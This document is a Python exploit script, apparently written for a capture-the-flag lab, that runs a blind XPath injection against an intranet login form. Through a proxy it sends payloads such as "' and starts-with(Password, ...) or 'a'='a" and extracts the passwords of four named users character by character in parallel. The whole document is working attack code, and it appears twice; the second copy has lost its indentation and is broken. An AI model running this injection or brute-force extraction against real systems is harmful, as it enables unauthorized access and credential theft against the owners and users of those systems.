0verflowme/unbalanced_xpath_injection.py

## unbalanced_xpath_injection.py
import time
import multiprocessing
import requests
from termcolor import cprint

#Thanks to vsnrain for showing me multiprocessing

users = ["bryan" ,"jim", "sarah","rita"]
pwchars = "aesr!lhvb0wotiyu14pdngm"
url = "http://172.31.179.1/intranet.php"
prx = {"http": "http://10.10.10.200:3128"}

def check(usr, psw, q):
    payload = f"{usr}' and starts-with(Password, '{psw}') or 'a'='a"
    dat = {"Username":payload, "Password": "a"}
   # print(dat)
    response = requests.request(
        "POST",
        url,
        data=dat,
        proxies=prx
 )
    html = response.content.decode("utf-8")
    if usr in html:
        q.put(psw)
    else:
        q.put(None)

def brute_user(username):
    pw = ""
    while True:
        Found = False
        resq = multiprocessing.Queue()

        n = 16      #Change this to your no. of CPU cores
        for i in range(0, len(pwchars), n):
            jobs = [multiprocessing.Process(target=check, args=(username, pw+c, resq,)) for c in pwchars[i:i+n]]

            [j.start() for j in jobs]
            [j.join() for j in jobs]
            res = [resq.get() for p in jobs]
            res = [r for r in res if r]
            if len(res) > 0:
                pw = res[0]
                Found = True
                print(f"{username} : {pw}")
                break
        if not Found:
            cprint(username + ':' + pw + " " ,'green',attrs=['bold','dark'])
            exit(0)

def main():
    p = [multiprocessing.Process(target=brute_user, args=(u,)) for u in users]
    for ok in p:
        ok.start()


if __name__ == '__main__':
    main()
	import time
	import multiprocessing
	import requests
	from termcolor import cprint

	#Thanks to vsnrain for showing me multiprocessing

	users = ["bryan" ,"jim", "sarah","rita"]
	pwchars = "aesr!lhvb0wotiyu14pdngm"
	url = "http://172.31.179.1/intranet.php"
	prx = {"http": "http://10.10.10.200:3128"}

	def check(usr, psw, q):
	payload = f"{usr}' and starts-with(Password, '{psw}') or 'a'='a"
	dat = {"Username":payload, "Password": "a"}
	# print(dat)
	response = requests.request(
	"POST",
	url,
	data=dat,
	proxies=prx
	)
	html = response.content.decode("utf-8")
	if usr in html:
	q.put(psw)
	else:
	q.put(None)

	def brute_user(username):
	pw = ""
	while True:
	Found = False
	resq = multiprocessing.Queue()

	n = 16 #Change this to your no. of CPU cores
	for i in range(0, len(pwchars), n):
	jobs = [multiprocessing.Process(target=check, args=(username, pw+c, resq,)) for c in pwchars[i:i+n]]

	[j.start() for j in jobs]
	[j.join() for j in jobs]
	res = [resq.get() for p in jobs]
	res = [r for r in res if r]
	if len(res) > 0:
	pw = res[0]
	Found = True
	print(f"{username} : {pw}")
	break
	if not Found:
	cprint(username + ':' + pw + " " ,'green',attrs=['bold','dark'])
	exit(0)

	def main():
	p = [multiprocessing.Process(target=brute_user, args=(u,)) for u in users]
	for ok in p:
	ok.start()


	if __name__ == '__main__':
	main()